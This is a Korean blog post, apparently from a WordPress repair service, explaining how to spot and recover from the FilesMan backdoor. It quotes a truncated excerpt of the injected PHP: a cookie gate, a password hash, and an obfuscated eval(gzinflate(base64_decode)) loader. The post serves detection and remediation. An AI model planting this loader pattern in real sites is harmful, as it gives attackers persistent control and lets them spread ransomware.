워드프레스 백도어 멀웨어 ( FilesMan ) 감염 치료 및 복구

최근 들어 일명 FilesMan 이라고 하는 멀웨어가 기승을 부리고 있습니다. 이 멀웨어는 워드프레스의 중요한 설정 파일들 (wp-config.php) 나 아니면 새로운 파일을 생성해서 백도어 코드를 심어 놓음으로해서.. 계속해서 공격자가 웹사이트 관리자에 접근해 악의적으로 웹사이트를 이용할수 있게 해줍니다.  웹사이트가 갑자기 이상한 사이트로 저절로 이동이 되거나 다운로드창이 뜨면서 랜섬웨어가 포함된 파일을 내려받도록 하는 현상이 생기면 이 멀웨어에 감염이 되었을 수 있습니다.  워드프레스 루트 디렉토리나 테마 디렉토리에서 config.php, ini.php, icons.php 등의 원래 워드프레스에 포함되어있지 않은 파일이 생성되어 있거나, wp-config,php, content-page.php, content-search.php, content-single.php 등에 아래와 같은 코드가 들어 있으면 이 멀웨어에 감염이 된것입니다.

[wpsm_codebox style=”1″] if (!isset($_COOKIE[’89cbb060aa2e47b3ebb6dfd85abf8420′])) {header(‘HTTP/1.0 404 Not Found’);exit;} ?> <?php $auth_pass = “b4192474d9e019fed71f11e936d216ab”; $color = “#df5”; $default_action = ‘FilesMan’; $default_use_ajax = true; $default_charset = ‘Windows-1251’; preg_replace(“/.*/e”,”\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28’5b19fxq30jD8d/[/wpsm_codebox]

이번에 복구의뢰가 들어온 웹사이트는 테마로 무료테마인 Vantage 테마를 이용하고 있었는데, 테마쪽 파일들 전체가 감염이 되어서, 랜섬웨어를 다운받도록 하는 증상이 보였습니다. 이런 경우는 따로 치료법이 없기때문에, 기존에 백업해 놓은 파일이 있으면 그 파일을 이용해 복구하거나 워드프레스코어파일들과 테마 파일을 새로 덮어 씌워야 합니다. 다소 복구 작업에 익숙하지 않은 분들은 복구 의뢰를 맡기시는것을 추천드립니다.

최근들어 더욱 멀웨어가 기승을 부리고 있는데, 랜섬웨어의 유포지가 되어버리면 구글 검색도 차단이 되고, 랜섬웨어에 감염된 고객들도 피해가 막심하니 꼭 보안 최적화와 웹사이트의 주기적인 백업에 관심을 가지시면 좋겠습니다.

Write a comment